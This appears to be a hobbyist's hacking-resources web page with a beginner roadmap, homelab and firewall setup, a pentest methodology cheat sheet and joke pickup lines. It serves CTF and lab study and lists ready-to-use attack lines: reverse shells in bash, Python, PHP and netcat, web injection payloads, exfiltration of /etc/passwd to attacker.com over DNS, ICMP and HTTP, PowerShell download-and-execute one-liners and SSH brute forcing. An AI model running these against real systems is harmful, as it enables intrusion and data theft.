~ NEW HACKING RESOURCES ~ writeups, tools, and uncommon commands ~ NO malware included!!! ~ let's pwn some boxes together~~~~
Links
Good Links
Equipment

so you want to get started hacking??

well you're gonna want some equipment! (WANT, not NEED) For me i have it split into different categories! lets start with the basics:

physical pentesting tools

useful software

Culture
the hacker e-bode

Quickstart

Welcome to the hacker e-bode, get in the zone!!

On here, we have writeups, uncommon commands, self-hosting tutorials, and all the resources you need to get hacking! Whether you're into web pentesting, binary exploitation, or hardware hacking, there's something here for you.

Getting Started Fast:

  • Check out HackTricks for comprehensive methodology guides
  • Use RevShells for quick reverse shell generators
  • GTFOBins for privilege escalation techniques
  • Join CTF platforms like HTB or TryHackMe to practice
  • Set up your own homelab for safe testing

Essential Tools Setup:

# Update your system
sudo apt update && sudo apt upgrade -y

# Install essential tools
sudo apt install -y nmap gobuster ffuf sqlmap john hydra \
  netcat-openbsd socat metasploit-framework

# Install web testing tools
sudo apt install -y burpsuite zaproxy nikto wpscan

# Install enumeration tools
sudo apt install -y enum4linux smbclient ldapsearch dnsenum

Beginners Guide

New to hacking? No worries! Everyone starts somewhere. Here's your roadmap:

Step 1: Learn the Fundamentals

  • Learn basic networking (TCP/IP, DNS, HTTP/HTTPS)
  • Get comfortable with Linux command line
  • Understand web technologies (HTML, JS, SQL)
  • Learn a scripting language (Python recommended!)

Step 2: Set Up Your Lab

  • Install Kali Linux or Parrot OS (VM recommended)
  • Set up VirtualBox or VMware
  • Download vulnerable VMs (DVWA, Metasploitable)
  • Never hack anything you don't own or have permission to test!

Step 3: Learn By Doing

  • Start with TryHackMe beginner rooms
  • Try OverTheWire wargames (Bandit is great for beginners)
  • Join HackTheBox and start with retired easy boxes
  • Read writeups but try yourself first!

Essential Beginner Commands

# Network Scanning
nmap -sV -sC 10.10.10.10

# Directory Enumeration
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# Find SUID binaries (privilege escalation)
find / -perm -u=s -type f 2>/dev/null

# Check for writable directories
find / -writable -type d 2>/dev/null

# Simple reverse shell (bash)
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

# Listen for connections
nc -lvnp 4444

Resources for Beginners

Remember: Hacking is about learning, not just running tools. Understand what each command does and why it works!

Self-Hosting Guide

Want to host your own services? Let's get you set up with a homelab!

Why Self-Host?

  • Full control over your data and privacy
  • Learn system administration and networking
  • Run your own CTF challenges for friends
  • Host your personal tools and projects
  • It's just really cool and fun!

Hardware You'll Need

  • Raspberry Pi 4/5 (cheap, low power) or old laptop
  • External storage (USB drive or SSD)
  • Good quality SD card (for Pi)
  • Ethernet cable (WiFi works but wired is better)

Getting Started with Docker

# Install Docker
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo usermod -aG docker $USER

# Install Docker Compose
sudo apt install docker-compose

# Create a docker-compose.yml file:
version: '3'
services:
  nginx:
    image: nginx:latest
    ports:
      - "80:80"
    volumes:
      - ./html:/usr/share/nginx/html

# Start your services
docker-compose up -d

Cool Self-Hosted Services

  • Nextcloud - Your own cloud storage
  • Pi-hole - Network-wide ad blocking
  • Wireguard - Personal VPN server
  • Gitea - Your own GitHub alternative
  • Jellyfin - Media server
  • Vaultwarden - Password manager
  • DVWA - Damn Vulnerable Web App for practice

Security Best Practices

  • Change default passwords immediately
  • Use SSH keys instead of passwords
  • Set up a firewall (ufw is easy)
  • Keep everything updated regularly
  • Use reverse proxy (nginx) with SSL certificates
  • Don't expose everything to the internet
  • Use Fail2ban to prevent brute force attacks
# Basic firewall setup
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow ssh
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp
sudo ufw enable

# Install and configure Fail2ban
sudo apt install fail2ban
sudo systemctl enable fail2ban
sudo systemctl start fail2ban

# Get free SSL certificates with Certbot
sudo apt install certbot python3-certbot-nginx
sudo certbot --nginx -d yourdomain.com

Useful Resources

Pro tip: Start small! Don't try to host everything at once. Get one service working well, then add more.

Methodology

Reconnaissance Phase

The first step in any engagement - gather information about your target!

Passive Recon

  • WHOIS Lookup: whois target.com
  • DNS Enumeration: dig target.com ANY
  • Subdomain Finding: Use Amass, Sublist3r, or crt.sh
  • Google Dorking: site:target.com filetype:pdf
  • Shodan: Search for exposed services

Active Recon

# Quick port scan
nmap -p- --min-rate=1000 -T4 target.com

# Service detection
nmap -sV -sC -p 22,80,443 target.com

# Full TCP scan with scripts
nmap -sV -sC -p- -oN nmap.txt target.com

# UDP scan (slower)
sudo nmap -sU --top-ports 20 target.com

Enumeration Phase

Deep dive into the services you found!

Web Enumeration

# Directory brute forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Subdomain enumeration
gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Technology fingerprinting
whatweb target.com
wappalyzer target.com

# Vulnerability scanning
nikto -h http://target.com

SMB Enumeration

# List shares
smbclient -L //target.com -N

# Connect to share
smbclient //target.com/share -U username

# Enumerate with enum4linux
enum4linux -a target.com

# Check for null sessions
smbmap -H target.com

FTP/SSH Enumeration

# Anonymous FTP login
ftp target.com
# username: anonymous, password: anonymous

# SSH banner grab
nc target.com 22

# Brute force (with permission!)
hydra -L users.txt -P passwords.txt target.com ssh

Exploitation Phase

Time to pop that shell! Remember: only on systems you own or have permission to test.

Web Exploitation

  • SQL Injection: ' OR '1'='1
  • XSS: <script>alert('XSS')</script>
  • Command Injection: ; ls -la
  • LFI: ../../../../etc/passwd
  • RFI: http://attacker.com/shell.php

Reverse Shells

# Bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP
php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Netcat
nc -e /bin/sh 10.10.10.10 4444

# Upgrade shell to fully interactive
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
export TERM=xterm

Privilege Escalation

# Linux PrivEsc
sudo -l
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab

# Run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Windows PrivEsc
whoami /priv
icacls "C:\Program Files"
net user
net localgroup administrators

# Run WinPEAS
.\winPEASx64.exe
Rizz

100% effective rizz lines to use TODAY

Are you a hidden file? Because I can feel you in my directory, even when I can't see you

You must be my SSH key, Because I trust you enough to let you in

Are you grep? Because you found exactly what I've been searching for

Girl, you're like a regex pattern—complex, beautiful, and I'd spend hours trying to figure you out

I always thought love was an abstract class, until you created an instance of it

Let's fork this process and spawn something beautiful together

you make me want to put my nic into promiscuous mode

Are you into programming? Because I find you extra cute able.

To Do

Things To add to the hacking e-bode

  • host hacktricks, pentestnotes, gtfobins, revshells
  • popups & scripts (is panko live, is panko online, twitch sub count, visitor count, status updates
  • writeups on obscure shit
  • writeups & uncommon commands
  • selfhost tutorial
  • study girl livestream page
  • good hacking dashboard
  • flesh out live2d & rigging section
  • ham radio section
  • tips and tricks
Updates!

Sep 17 - started makin stuff

Sep 19 - moved index to prod - you can see this now!

Nov 08 - filled out hacking page with beginner guides!

Resources

Essential Wordlists

Where to get wordlists:

  • SecLists: /usr/share/seclists/ (or github.com/danielmiessler/SecLists)
  • RockYou: /usr/share/wordlists/rockyou.txt
  • Dirbuster Lists: /usr/share/wordlists/dirbuster/

Most Used Lists:

  • Directories: directory-list-2.3-medium.txt
  • Subdomains: subdomains-top1million-5000.txt
  • Passwords: rockyou.txt (14 million passwords!)
  • Usernames: xato-net-10-million-usernames.txt
# Download SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Extract rockyou
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

# Create custom wordlist from website
cewl http://target.com -d 2 -m 5 -w custom_wordlist.txt
Useful Commands

Uncommon But Useful Commands

File Transfers

# Python HTTP server
python3 -m http.server 8000

# Download file on target
wget http://attacker.com:8000/file
curl http://attacker.com:8000/file -o file

# Netcat file transfer
# Receiver:
nc -lvnp 4444 > file
# Sender:
nc target.com 4444 < file

# Base64 transfer (when file transfer blocked)
base64 file.txt
# Copy output, then on target:
echo "base64string" | base64 -d > file.txt

Port Forwarding

# SSH Local port forward
ssh -L 8080:localhost:80 user@target.com

# SSH Remote port forward
ssh -R 4444:localhost:8080 user@attacker.com

# SSH Dynamic port forward (SOCKS proxy)
ssh -D 9050 user@target.com

# Chisel (when SSH not available)
# On attacker:
./chisel server -p 8000 --reverse
# On target:
./chisel client attacker.com:8000 R:4444:localhost:80

Data Exfiltration

# DNS exfiltration
cat /etc/passwd | xxd -p -c 31 | while read line; do dig $line.attacker.com; done

# ICMP exfiltration
cat file.txt | xxd -p -c 16 | while read line; do ping -c 1 -p $line attacker.com; done

# HTTP POST exfiltration
curl -X POST -d @/etc/passwd http://attacker.com/upload

Living Off The Land

# Download file with certutil (Windows)
certutil -urlcache -f http://attacker.com/file.exe file.exe

# Download with PowerShell
powershell -c "Invoke-WebRequest -Uri 'http://attacker.com/file' -OutFile 'file'"

# Execute in memory (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')

# Compile and execute C# in memory
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:shell.exe shell.cs
Tips & Tricks

Pro Tips

Always Enumerate

When you get stuck, enumerate more! Check for:

  • Hidden files and directories (.git, .svn, .env)
  • Backup files (file.bak, file~, file.old)
  • Version disclosures in headers/source
  • User enumeration via timing attacks

Google is Your Friend

Found a service? Search for:

  • "service name" exploit
  • "service name" default credentials
  • "service version" CVE
  • Check ExploitDB and Searchsploit

Take Notes!

Use tools like:

  • CherryTree for organized notes
  • Obsidian for markdown notes
  • Joplin for sync across devices
  • Just a simple text file works too!

Screenshot Everything

For CTFs and pentest reports, you'll need proof!

# Take screenshot with scrot
scrot screenshot.png

# Use flameshot for annotations
flameshot gui

# Record terminal with asciinema
asciinema rec session.cast

Practice Makes Perfect

  • Do at least one box per week
  • Read other people's writeups
  • Try harder (but take breaks too!)
  • Join the community on Discord/Reddit
  • Help others - teaching helps you learn

Remember: The hacker mindset is about curiosity and persistence. Never give up!